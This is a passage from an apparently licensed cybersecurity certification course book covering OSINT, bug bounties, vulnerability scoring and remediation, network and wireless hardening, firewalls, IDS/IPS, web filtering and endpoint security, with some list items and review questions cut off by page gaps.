operations, OSINT is used to identify vulnerabilities and threat information by
gathering data from many sources such as blogs, forums, social media platforms,
and even the dark web. This can include information about new types of malware,
attack strategies used by cybercriminals, and recently discovered software
vulnerabilities. Security researchers can use OSINT tools to automatically collect and
analyze this information, identifying potential threats or vulnerabilities that could
impact their organization.
Some common OSINT tools include Shodan for investigating Internet-connected
devices, Maltego for visualizing complex networks of information, Recon-ng for
web-based reconnaissance activities, and theHarvester for gathering emails,
subdomains, hosts, and employee names from different public sources.
The OSINT Framework is a useful resource designed to help locate and organize tools
used to perform open-source intelligence. https://github.com/lockfale/osint-framework
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
OSINT can provide valuable context to aid in assessing risk levels associated with
a specific vulnerability. For example, newly discovered vulnerabilities that are
being actively exploited in the wild or discussed in hacking forums will need to be
prioritized for remediation. In this way, OSINT helps identify vulnerabilities and
plays a critical role in vulnerability management and threat assessment.
• Dark Web—sites, content, and services accessible only over a dark net. While
there are dark web search engines, many sites are hidden from them. Access to a
dark web site via its URL is often only available via “word of mouth” bulletin boards.
Using the TOR browser to view the AlphaBay market, now closed by law enforcement.
(Screenshot used with permission from Security Onion.)
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Investigating these dark web sites and message boards is a valuable source of
counterintelligence. The anonymity of dark web services has made it easy for
investigators to infiltrate the forums and web stores that have been set up to
exchange stolen data and hacking tools. As adversaries react to this, they are
setting up new networks and ways of identifying law enforcement infiltration.
Consequently, dark nets and the dark web represent a continually shifting
landscape.
Please note that participating in illegal activities on the dark web is strictly prohibited.
To stay safe, it is important to exercise caution and follow legal and ethical guidelines
when exploring the dark web.
The dark web is generally associated with illicit activities and illegal content, but it
also has legitimate purposes.
Privacy and Anonymity—The dark web provides a platform for enhanced privacy
and anonymity. It allows users to communicate and browse the Internet without
revealing their identity or location, which can be valuable for whistleblowers,
journalists, activists, or individuals living under repressive government regimes.
Access to Censored Information—In countries with strict Internet censorship, the
dark web can be an avenue for accessing information that is otherwise blocked or
restricted. It enables individuals to bypass censorship and access politically sensitive
or controversial content.
Research and Information Sharing—Some academic researchers or cybersecurity
professionals may explore the dark web to gain insights into criminal activities and
analyze emerging threats to improve cybersecurity operations.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Bug Bounties
Bug bounty programs are another proactive strategy and describe when
organizations incentivize discovering and reporting vulnerabilities by offering
rewards to external security researchers or “white hat” hackers. Both penetration
testing and bug bounty programs are proactive cybersecurity practices to identify
and mitigate vulnerabilities in a system or application. They both involve exploiting
vulnerabilities to understand their potential impact, with the difference lying
primarily in who conducts the testing and how it’s structured. Penetration testing
is typically performed by a hired team of professional ethical hackers within a
confined time frame, using a structured approach based on the organization’s
requirements. This approach allows for a focused, in-depth examination of specific
systems or applications and provides a predictable cost and timeline.
In contrast, bug bounty programs open the testing process to a global community
of independent security researchers. Rewards for finding and reporting
vulnerabilities incentivize these researchers. This approach can bring diverse skills
and perspectives to the testing process, potentially uncovering more complex or
obscure vulnerabilities.
An organization may choose penetration testing for a more controlled, targeted
assessment, especially when testing specific components or meeting certain
compliance requirements. A bug bounty program might be preferred when
seeking a more extensive range of testing, leveraging the collective skills of a
global community. However, many organizations see the value in both and use a
combination of pen testing and bug bounty programs to ensure comprehensive
vulnerability management.
The HackerOne platform is designed to support security researchers and promote responsible
disclosure of vulnerabilities. (Screenshot used with permission from HackerOne.)
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Auditing
Auditing is an essential part of vulnerability management. Where product audits
are focused on specific features, such as application code, system/process audits
interrogate the wider use and deployment of products, including supply chain,
configuration, support, monitoring, and cybersecurity. Security audits assess an
organization’s security controls, policies, and procedures, often using standards
like ISO 27001 or the NIST Cybersecurity Framework as benchmarks. These audits
can identify technical vulnerabilities and operational weaknesses impacting an
organization’s security posture.
Cybersecurity audits are comprehensive reviews designed to ensure an
organization’s security posture aligns with established standards and best practices.
There are various types of cybersecurity audits, including compliance audits, which
assess adherence to regulations like GDPR or HIPAA; risk-based audits, which
identify potential threats and vulnerabilities in an organization’s systems and
processes; and technical audits, which delve into the specifics of the organization’s
IT infrastructure, examining areas like network security, access controls, and data
protection measures.
Penetration testing fits into cybersecurity audit practices as a critical component of
a technical audit as it provides a practical assessment of the organization’s defenses
by simulating real-world attack scenarios. Rather than simply evaluating policies or
configurations, penetration tests actively seek exploitable vulnerabilities, providing
a clear picture of what an attacker might achieve. The findings from these tests are
then used to improve the organization’s security controls and mitigate identified
risks.
Penetration tests also play an important role in compliance audits, as many
regulations require organizations to conduct regular penetration testing as part
of their cybersecurity program. For instance, the Payment Card Industry Data
Security Standard (PCI DSS) mandates annual and proactive penetration tests for
organizations handling cardholder data.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Review Activity:
Vulnerability Identification Methods
5
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Topic 8D
Vulnerability Analysis and Remediation
4
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
The CVE dictionary provides the principal input for NIST’s National Vulnerability
Database (nvd.nist.gov). The NVD supplements the CVE descriptions with additional
analysis, a criticality metric, calculated using the Common Vulnerability Scoring
System (CVSS), plus fix information.
CVSS is maintained by the Forum of Incident Response and Security Teams
(first.org/cvss). CVSS metrics generate a score from 0 to 10 based on characteristics
of the vulnerability, such as whether it can be triggered remotely or needs local
access, whether user intervention is required, and so on. The scores are banded
into descriptions too:
Score Description
0.1+ Low
4.0+ Medium
7.0+ High
9.0+ Critical
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Vulnerability Analysis
Vulnerability analysis is critical in supporting several key aspects of an organization’s
cybersecurity strategy, including prioritization, vulnerability classification,
considerations of exposure, organizational impact, and risk tolerance contexts.
Prioritization
Vulnerability analysis helps prioritize remediation efforts by identifying the most
critical vulnerabilities that pose the most significant risk to an organization.
Prioritization is typically based on factors such as the severity of the vulnerability,
the ease of exploitation, and the potential impact of an attack. Prioritizing
vulnerabilities helps an organization focus limited resources on addressing the
most significant threats first.
Classification
Vulnerability analysis aids in vulnerability classification, categorizing vulnerabilities
based on their characteristics, such as the type of system or application affected,
the nature of the vulnerability, or the potential impact. Classification can help clarify
the scope and nature of an organization’s threats.
Exposure Factor
Vulnerability analysis must also consider exposure factors, like the accessibility
of a vulnerable system or data, and environmental factors, like the current threat
landscape or the specifics of the organization’s IT infrastructure. These factors can
significantly influence the likelihood of a vulnerability being exploited and directly
impact its overall risk level.
Exposure factor (EF) represents the extent to which an asset is susceptible to
being compromised or impacted by a specific vulnerability, and it helps assess the
potential impact or loss that could occur if the vulnerability is exploited. Factors
might include weak authentication mechanisms, inadequate network segmentation,
or insufficient access control methods.
Impacts
Vulnerability analysis assesses the potential organizational impact of vulnerabilities.
This could be financial loss, reputational damage, operational disruption, or
regulatory penalties. Understanding this impact is crucial for making informed
decisions about risk mitigation.
Environmental Variables
Several environmental variables play a significant role in influencing vulnerability
analysis. One of the primary environmental factors is the organization’s IT
infrastructure, which includes the hardware, software, networks, and systems in
use. These components’ diversity, complexity, and age can affect the number and
types of vulnerabilities present. For instance, legacy systems may have known
unpatched vulnerabilities, while new, emerging technologies might introduce
unknown vulnerabilities.
The external threat landscape is another crucial environmental factor. The
prevalence of certain types of attacks or the activities of specific threat actors can
affect the likelihood of particular vulnerabilities being exploited. For example, if
ransomware attacks are rising within the medical industry, vulnerabilities that are
exploited as part of those attacks must be prioritized in that sector.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Risk Tolerance
Vulnerability analysis must align with an organization’s risk tolerance. Risk
tolerance refers to the level of risk an organization is willing to accept, and this can
vary greatly depending on the organization’s size, industry, regulatory environment,
and strategic objectives. By aligning vulnerability analysis with risk tolerance, an
organization can ensure that its vulnerability management efforts align with its
overall risk management strategy.
Remediation Practices
• Patching is one of the most straightforward and effective remediation practices.
It involves applying updates and patches to software or systems to fix known
vulnerabilities. Patching helps prevent attackers from exploiting known
vulnerabilities, improving an organization’s security posture. Robust, centralized
patch management processes are essential to ensure patches are applied
promptly and consistently. A patch management program focuses on regularly
installing software patches to address vulnerabilities and improve security in
various types of systems, including operating systems, network devices (routers,
switches, and firewalls), databases, web applications, desktop applications (email
clients, web browsers, and office productivity applications), and other software
applications deployed within an organization’s IT environment.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Validation
Validating vulnerability remediation is critically important for several key reasons.
Validation ensures that the remediation actions have been implemented correctly
and function as intended. Despite best intentions, human error or technical
problems can frequently lead to incomplete or incorrect implementation of fixes.
These issues go unnoticed without validation, exposing the organization to the
same vulnerability it originally sought to address.
Validation helps confirm that the remediation has not inadvertently introduced new
issues or vulnerabilities. For example, a patch may interfere with other software or
systems, or a configuration change could expose new security gaps.
Also, validation provides a measure of accountability, ensuring that responsible
parties have adequately addressed identified vulnerabilities. This is especially
important in larger organizations where multiple teams or individuals may be
involved in the remediation process.
• Re-scanning involves performing additional vulnerability scans after
remediation actions have been implemented. The re-scan aims to determine if
the vulnerabilities identified in the initial scan have been resolved. If the same
vulnerabilities are not identified in the re-scan, it strongly indicates that the
remediation efforts were successful.
Reporting
Vulnerability reporting is a crucial aspect of vulnerability management and is
critical in maintaining an organization’s cybersecurity posture. A comprehensive
vulnerability report highlights the existing vulnerabilities and ranks them based
on their severity and potential impact on the organization’s assets, enabling the
management to prioritize remediation efforts effectively.
The Common Vulnerability Scoring System (CVSS) provides a standardized method
for rating the severity of vulnerabilities and includes metrics such as exploitability,
impact, and remediation level. By using CVSS, organizations can compare and
prioritize vulnerabilities consistently.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Review Activity:
Vulnerability Analysis and
Remediation
5
present on a host, but you have established that the host is not running
CentOS. What type of scanning error event is this?
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Lesson 8
Summary
4
• Run scans regularly and review the results to identify false positives and false
negatives, using log review and additional CVE information to validate results if
necessary.
• Consider implementing penetration testing exercises, ensuring that these are set
up with a clear project scope.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Capabilities
LESSON INTRODUCTION
Secure baselines, hardening, wireless security, and network access control
are fundamental concepts in cybersecurity. Secure baselines establish a set of
standardized security configurations for different types of IT assets, such as
operating systems, networks, and applications. These baselines represent a starting
point for security measures, offering a defined minimum level of security that all
systems must meet.
Hardening is the process of reducing system vulnerabilities to make IT resources
more resilient to attacks. It involves disabling unnecessary services, configuring
appropriate permissions, applying patches and updates, and ensuring adherence to
secure configurations defined by the secure baselines. Wireless security describes
the measures to protect wireless networks from threats and unauthorized access.
This includes using robust encryption (like WPA3), secure authentication methods
(like RADIUS in enterprise mode), and monitoring for rogue access points.
Network access control (NAC) is a security solution that enforces policy on devices
seeking to access network resources. It identifies, categorizes, and manages
the activities of all devices on a network, ensuring they comply with security
policies before granting access and continuously monitoring them while they are
connected. These concepts form a multilayered security approach to protect an
organization’s IT infrastructure from various cyber threats.
Lesson Objectives
In this lesson, you will do the following:
• Describe the importance of secure baselines.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Topic 9A
Network Security Baselines
2
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Hardening Concepts
Network equipment, software, and operating systems use default settings from
the developer or manufacturer which attempt to balance ease of use with security.
Default configurations are an attractive target for attackers as they usually include
well-documented credentials, allow simple passwords, use insecure protocols,
and many other problematic settings. By leaving these default settings in place,
organizations increase the likelihood of successful cyberattacks. Therefore, it’s
crucial to change these default settings to improve security.
Hardening describes the methods to improve a device’s security by changing its
default configuration, often by implementing the recommendations in published
secure baselines.
• Implement Access Control Lists (ACLs) to restrict access to the router or switch
to only required devices and networks.
• Enable Logging and Monitoring to help identify issues like repeated login
failures, configuration changes, and many others.
• Configure Port Security helps limit the devices that can connect to a switch port
to prevent unauthorized access.
• Disable Unnecessary Services to reduce the attack surface of the server. Each
service running on a server represents a potential point of entry for an attacker.
• Least Privilege Principle limits each user to the least amount of privilege
necessary to perform a function to reduce the impact of a compromised
account.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
• Use Firewalls and Intrusion Detection Systems (IDS) to help block or alert on
malicious activity.
• Enable Logging and Monitoring to help identify issues like repeated login
failures, configuration changes, and many others similar to the benefits for
network equipment.
The 5 GHz band has more space to configure nonoverlapping channels. Also note that
a WAP can use bonded channels to improve bandwidth, but this increases risks from
interference.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Example output from Lizard System's Wi-Fi Scanner tool. (Screenshot courtesy of Lizard Systems.)
These readings are combined and analyzed to produce a heat map, showing
where a signal is strong (red) or weak (green/blue), and which channel is being used
and how they overlap. This data is then used to optimize the design by adjusting
transmit power to reduce a WAP’s range, changing the channel on a WAP, adding a
new WAP, or physically moving a WAP to a new location.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Wireless Encryption
As well as the site design, a wireless network must be configured with security
settings. Without encryption, anyone within range can intercept and read packets
passing over the wireless network. Security choices are determined by device
support for the various Wi-Fi security standards, by the type of authentication
infrastructure, and by the purpose of the WLAN. Security standard determine which
cryptographic protocols are supported, the means of generating the encryption key,
and the available methods for authenticating wireless stations when they try to join
(or associate with) the network.
The first version of Wi-Fi Protected Access (WPA) was designed to fix critical
vulnerabilities in the earlier wired equivalent privacy (WEP) standard. Like WEP,
version 1 of WPA uses the RC4 stream cipher but adds a mechanism called the
Temporal Key Integrity Protocol (TKIP) to make it stronger.
Configuring a TP-LINK SOHO access point with wireless encryption and authentication settings.
In this example, the 2.4 GHz band allows legacy connections with WPA2-Personal security, while
the 5 GHz network is for 802.11ax (Wi-Fi 6) capable devices using WPA3-SAE authentication.
(Screenshot used with permission from TP-Link Technologies.)
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Unfortunately, WPS is vulnerable to a brute force attack. While the PIN is eight
characters, one digit is a checksum and the rest are verified as two separate PINs
of four and three characters. These separate PINs are many orders of magnitude
simpler to brute force, typically requiring just hours to crack. On some models,
disabling WPS through the admin interface does not actually disable the protocol,
or there is no option to disable it. Some APs can lock out an intruder if a brute force
attack is detected, but in some cases, the attack can just be resumed when the
lockout period expires.
To counter this, the lockout period can be increased. However, this can leave APs
vulnerable to a denial of service (DoS) attack. When provisioning a WAP, it is essential to
verify what steps the manufacturer has taken to make their WPS implementation secure
and to use the required device firmware level identified as secure.
The Easy Connect method, announced alongside WPA3, is intended to replace WPS
as a method of securely configuring client devices with the information required to
access a Wi-Fi network. Easy Connect is a brand name for the Device Provisioning
Protocol (DPP).
Each participating device must be configured with a public/private key pair. Easy
Connect uses quick response (QR) codes or near-field communication (NFC) tags
to communicate each device’s public key. A smartphone is registered as an Easy
Connect configurator app and associated with the WAP using its QR code. Each
client device can then be associated by scanning its QR code or NFC tag in the
configurator app. As well as fixing the security problems associated with WPS, this
is a straightforward means of configuring headless Internet of Things (IoT) devices
with Wi-Fi connectivity.
• Enhanced Open—encrypts traffic between devices and the access point, even
without a password, which increases privacy and security on open networks.
Wi-Fi performance also depends on device support for the latest 802.11 standards. The
most recent generation (802.11ax) is being marketed as Wi-Fi 6. The earlier standards
are retroactively named Wi-Fi 5 (802.11ac) and Wi-Fi 4 (802.11n). The performance
standards are developed in parallel with the WPA security specifications. Most Wi-Fi 6
devices and some Wi-Fi 5 and Wi-Fi 4 products should support WPA3 either natively or
with a firmware/driver update.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
All types of Wi-Fi personal authentication have been shown to be vulnerable to attacks
that allow dictionary or brute force attacks against the passphrase. At a minimum, the
passphrase must be at least 14 characters long to try to mitigate risks from cracking.
The configuration interfaces for access points can use different labels for these methods.
You might see WPA2-Personal and WPA3-SAE rather than WPA2-PSK and WPA3-
Personal, for example. Additionally, an access point can be configured for WPA3 only or
with support for legacy WPA2 (WPA3-Personal Transition mode). Researchers already
found flaws in WPA3-Personal, one of which relies on a downgrade attack to use WPA2
(wi-fi.org/security-update-april-2019).
Advanced Authentication
Wireless enterprise authentication modes, such as WPA2/WPA3-Enterprise,
include several essential components designed to improve security for corporate
wireless networks. One important element is 802.1x authentication, which provides
a port-based network access control framework, ensuring that only authenticated
devices are granted network access. Typically, 802.1x requires an authentication
server such as RADIUS (Remote Authentication Dial-In User Service), which verifies
the credentials of users or devices trying to connect to the network.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
2. The NAS prompts the user for their authentication credentials. RADIUS
2.
supports PAP, CHAP, and EAP. Most implementations now use EAP, as PAP
and CHAP are not secure. If EAP credentials are required, the NAS enables the
supplicant to transmit EAP over LAN (EAPoL) data, but not any other type of
network traffic.
3. The supplicant submits the credentials as EAPoL data. The RADIUS client uses
3.
4. The AAA server decrypts the Access-Request using the shared secret. If
4.
6. At the end of this exchange, if the supplicant is authenticated, the AAA server
6.
Optionally, the NAS can use RADIUS for accounting (logging). Accounting uses port
1813. The accounting server can be different from the authentication server.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Defining policy violations in PacketFence Open Source NAC. (Screenshot used with permission
from packetfence.org.)
PacketFence supports the use of several scanning techniques, including vulnerability scanners,
such as Nessus and OpenVAS, Windows Management Instrumentation (WMI) queries, and log
parsers. (Screenshot used with permission from packetfence.org.)
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Review Activity:
Network Security Baselines
3
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Topic 9B
Network Security Capability
Enhancement
5
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Sample firewall rules configured on IPFire. This ruleset allows any HTTP, HTTPS, or SMTP traffic to
specific internal addresses. (Screenshot used with permission from IPFire)
Each rule can specify whether to block or allow traffic based on several parameters,
often referred to as tuples. If you think of each rule being like a row in a database,
the tuples are the columns. For example, in the previous screenshot, the
tuples include Protocol, Source (address), (Source) Port, Destination (address),
(Destination) Port, and so on.
Even the simplest packet-filtering firewall can be complex to configure securely. It
is essential to create a written policy describing what a filter ruleset should do and
to test the configuration as far as possible to ensure that the ACLs you have set
up work as intended. Also, test and document changes made to ACLs. Some other
basic principles include the following:
• Block incoming requests from internal or private IP addresses (that have
obviously been spoofed).
• Block incoming requests from protocols that should only function at a local
network level, such as ICMP, DHCP, or routing protocol traffic.
• Take the usual steps to secure the hardware on which the firewall is running and
use the management interface.
For instance, a firewall rule can be specifically designed to permit or deny traffic
based on the TCP or UDP port numbers that a service operates on. If a web server
on a network should only allow incoming HTTP and HTTPS traffic, rules could be set
up to allow traffic only on ports 80 (HTTP) and 443 (HTTPS), the standard ports for
these services. Similarly, rules can be defined to restrict certain protocols such as
FTP or SSH from entering the network if they are not needed, thereby reducing the
potential attack surface.
Additionally, you can use firewall rules to restrict outgoing traffic to prevent certain
types of communication from inside the network. For instance, a rule can block all
outgoing traffic to port 25 (SMTP) to prevent a compromised machine within the
network from sending out spam emails.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Screened Subnet
A screened subnet, also known as a perimeter network, creates an additional
layer of protection between an organization’s internal network and the Internet.
A screened subnet acts as a neutral zone, separating public-facing servers from
sensitive internal network resources to reduce the exposure of the internal network
resource to external threats. In practical terms, the screened subnet often hosts
web, email, DNS, or FTP services. These systems must typically be accessible from
the public Internet but isolated from sensitive internal systems to limit the impact of
a breach of one of these services. By placing these servers in the screened subnet,
an organization can limit the damage if these servers are compromised.
Firewalls are typically used to create and control the traffic to and from the
screened subnet. The first firewall, between the Internet and the screened subnet,
is configured to allow traffic to the services hosted in the screened subnet.
The second firewall, between the screened subnet and the internal network, is
configured to block most (practically all) traffic from the screened subnet to the
internal network. A screened subnet is a fundamental part of a network’s security
architecture and an important example of network segmentation as a type of
security control.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
In contrast, intrusion prevention systems (IPS), like Suricata, are proactive security
tools that detect potential threats and take action to prevent or mitigate them. An
IPS identifies a threat using methods similar to an IDS and can block traffic from the
offending source, drop malicious packets, or reset connections to disrupt an attack.
While this can immediately prevent damage, there is a risk of false positives leading
to blocking legitimate traffic.
Important IDS & IPS tools include the following:
• Snort is one of the most well-known IDS tools. It uses a rule-driven language,
which combines the benefits of signature, protocol, and anomaly-based
inspection methods, providing robust detection capabilities. Snort’s open-source
nature and widespread adoption have led to a large community contributing
rules and configurations, making it a versatile tool for various environments.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
The Security Onion Alerts dashboard displaying several alerts captured using the Emerging
Threats (ET) ruleset and Suricata. (Screenshot used with permission from Security Onion.)
Signature-Based Detection
Signature-based detection (or pattern-matching) means that the engine is loaded
with a database of attack patterns or signatures. If traffic matches a pattern then
the engine generates an incident.
Snort rules file supplied by the open source Emerging Threats community feed.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
The signatures and rules (often called plug-ins or feeds) powering intrusion
detection need to be updated regularly to provide protection against the latest
threat types. Commercial software requires a paid-for subscription to obtain
the updates. It is important to configure software to update only from valid
repositories, ideally using a secure connection method such as HTTPS.
• Network traffic analysis (NTA)—are products are closer to IDS and NBAD in
that they apply analysis techniques only to network streams rather than multiple
network and log data sources.
Often behavioral- and anomaly-based detection are taken to mean the same
thing (in the sense that the engine detects anomalous behavior). This may not
always be the case. Anomaly-based detection can also mean specifically looking
for irregularities in the use of protocols. For example, the engine may check
packet headers or the exchange of packets in a session against RFC standards and
generate an alert if they deviate from strict RFC compliance.
Trend Analysis
Trend analysis is a critical aspect of managing intrusion detection systems (IDS)
and intrusion prevention systems (IPS) as it aids in understanding an environment
over time, helping to identify patterns, anomalies, and potential threats. Security
analysts can identify patterns and trends that indicate ongoing or growing threats
by tracking events and alerts. For example, an increase in alerts related to a specific
attack may suggest that a network is being targeted for attack or that a vulnerability
is being actively exploited. Trending can also help in tuning IDS/IPS systems.
Over time, security analysts can identify false positives or unnecessary alerts that
appear frequently. These alerts can be tuned down so analysts can focus on more
important alerts.
Trending data can contribute to operational security strategies by identifying
common threats and frequently targeted systems. This approach highlights areas
of weakness that need attention, either through changes in security policy or
investment in additional security tools and training.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Web Filtering
Web filtering is essential to cybersecurity operations, playing a pivotal role in
safeguarding an organization’s network. Its primary function is to block users from
accessing malicious or inappropriate websites, thereby protecting the network from
potential threats. Web filters analyze web traffic, often in real time, and can restrict
access based on various criteria such as URL, IP address, content category, or even
specific keywords.
One of the key benefits of web filtering is the prevention of malware, including
ransomware and phishing attacks, which often originate from malicious websites.
By restricting access to these sites, web filters significantly reduce the risk of
malware infections. Web filtering can also increase employee productivity and limit
legal liability by preventing access to inappropriate or non-work-related content. It
plays a crucial role in data loss prevention (DLP) strategies by blocking certain types
of data transfer or access to sites known for data leakage.
Agent-Based Filtering
Agent-based web filtering involves installing a software agent on desktop
computers, laptops, and mobile devices. The agents enforce compliance with
the organization’s web filtering policies. Agents communicate with a centralized
management server to retrieve filtering policies and rules and then apply them
locally on the device. Agent-based solutions typically leverage cloud platforms to
ensure they can communicate with devices regardless of the network they are
connected to. This means filtering policies remain in effect even when users are off
the corporate network, such as when working from home or traveling.
Agent-based filtering can also provide detailed reporting and analytics. The agent
can log web access attempts and return this data to a management server for
analysis allowing security analysts to monitor Internet usage patterns, identify
attempts to access blocked content, and fine-tune the filtering rules as required.
Because filtering occurs locally on the device, agent-based methods often provide
more granular control, such as filtering HTTPS traffic or applying different filtering
rules for different applications.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
• Block Rules—use the proxy server to implement block rules based on various
factors such as the website’s URL, domain, IP address, content category, or
even specific keywords within the web content. For example, an organization
could block all .exe downloads to prevent the accidental download of potentially
harmful files.
Web filter content categories using the IPFire open-source firewall. (Screenshot used
with permission from IPFire.)
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Review Activity:
Network Security Capability
Enhancement
6
monitoring software?
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Lesson 9
Summary
5
• Automate the rollout and management of secure baselines using tools such as
Active Directory Group Policy, Ansible, Puppet, or Chef.
• Use firewalls, IDS/IPS, and web filtering to monitor and control network traffic
and block access to malicious or inappropriate content.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
LESSON INTRODUCTION
Endpoint security aims to secure every endpoint connected to a network, from
laptops to smartphones, tablets, and other IoT devices, to prevent them from being
an attack entry point. Effective endpoint security has become increasingly important
as the number and types of devices connected to networks continue to expand.
For traditional computing devices such as desktops and laptops, hardening
practices typically ensure operating systems and all installed applications are
regularly updated, user access is limited, firewalls and antivirus software are
enabled and updated, and unused software, services, and ports are disabled or
removed to minimize potential attack vectors.
Security strategies may include additional considerations for mobile devices such
as smartphones and tablets. While keeping the operating system and applications
updated is still crucial, other practices such as disabling unnecessary features
(like Bluetooth and NFC when not in use), limiting app permissions, and avoiding
unsecured Wi-Fi networks become increasingly important. Installing trusted
security apps, enabling device encryption, and enforcing screen locks are essential
considerations. Mobile device management (MDM) solutions help manage and
control security features across various mobile devices.
Hardening embedded systems and IoT devices focuses on physical security and
firmware integrity, as these systems often control physical processes or are located
in unsecured environments. Applying regular firmware updates, employing secure
boot processes to maintain firmware integrity, and ensuring communications are
encrypted are common practices. Since these systems have limited computational
capabilities, they require lightweight but robust security solutions.
Lesson Objectives
In this lesson, you will do the following:
• Explore the importance of endpoint hardening.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Topic 10A
Implement Endpoint Security
2
Endpoint Hardening
Operating System Security
Operating system security encompasses many practices that aim to protect
against unauthorized access, data breaches, malware infections, and other
security threats. There are many considerations and requirements when securing
an operating system because operating systems are complicated and powerful
software products that operate at the core of all information systems. Many
security concepts apply to operating system security, including access controls,
authentication mechanisms, secure configurations, application security, secure
coding, patch management, endpoint protection, user awareness training, and
monitoring.
Hardening describes changing an operating system or application to make it
operate securely. The need for hardening must be balanced against functional
requirements and usability because hardening can often negatively impact how
applications work or interoperate.
Best practice baselines play a critical role in device hardening by providing a
standard set of guidelines or checklists for configuring devices securely. These
baselines, often developed by cybersecurity experts or organizations, offer a
starting point for systems administrators to ensure that devices are configured
according to industry security standards. Many of the requirements can be applied
automatically via a configuration baseline template. The essential principle is
of least functionality; that a system should run only the protocols and services
required by legitimate users and no more. This reduces the potential attack surface.
• Interfaces provide a connection to the network. Some machines may have more
than one interface. For example, there may be wired and wireless interfaces or
a modem interface. Some machines may come with a management network
interface card. If any of these interfaces are not required, they should be
explicitly disabled rather than simply left unused.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
It is also important to establish a maintenance cycle for each device and keep up to
date with new security threats and responses for the particular software products
that you are running.
Workstations
Workstations operate at the frontline of an organization’s activities and present
unique concerns regarding endpoint hardening compared to other devices. Due
to the varied tasks and numerous applications associated with workstation use,
they generally have a large attack surface. Hardening practices to minimize this
attack surface include removing unnecessary software, limiting administrative
privileges, strictly managing application installations and updates, and many
other changes. Furthermore, since employees operate workstations, user-focused
security strategies are essential, including regular training and awareness activities
to educate users about threats such as phishing and promoting secure behaviors
such as strong password practices, responsible Internet use, and careful handling of
sensitive data, among other practices.
Additionally, configuring workstation settings for increased security, like automatic
updates, screen locks, firewalls, endpoint protection, intrusion detection and
prevention, increased logging, encryption, monitoring, and many other protections,
are essential. Also, the need to secure peripheral devices like USB ports is unique
to workstations. It is often achieved using features of endpoint protection software
and the implementation of strict device control policies. Lastly, given the various
roles and responsibilities assigned to different workstations, segmentation is crucial
to restrict communications and limit the potential for malware or attackers to
propagate across the network.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Using Security Compliance Manager to compare settings in a production GPO with Microsoft’s
template policy settings. (Screenshot used with permission from Microsoft.)
Endpoint Protection
The purpose of device hardening is to enhance a system’s security by minimizing
the potential vulnerabilities a malicious entity could exploit. This is achieved by
configuring network and system settings to reduce their attack surface.
Segmentation
Segmentation is crucial to securing an enterprise environment because it reduces
the potential impact of a cybersecurity incident by isolating systems and limiting
the spread of an attack or malware infection. In a segmented network, systems
are divided into separate segments or subnets, each with distinct security controls
and access permissions. This type of segmentation significantly complicates
an attacker’s work, giving an organization more time to detect and respond.
Furthermore, segmentation allows more granular control over data access to
ensure users, devices, and applications only have access to the information
necessary for their specific tasks, thus enhancing data protection and privacy.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
A segmented network showing Marketing and Finance subnets and the placement of network
devices. Traffic between the two networks is controlled by the router. (Images © 123RF.com.)
Isolation
Device isolation refers to segregating individual devices within a network to limit
their interaction with other devices and systems. This aims to enhance endpoint
protection by preventing the lateral spread of threats should a device become
compromised. In the context of endpoint protection, device isolation creates
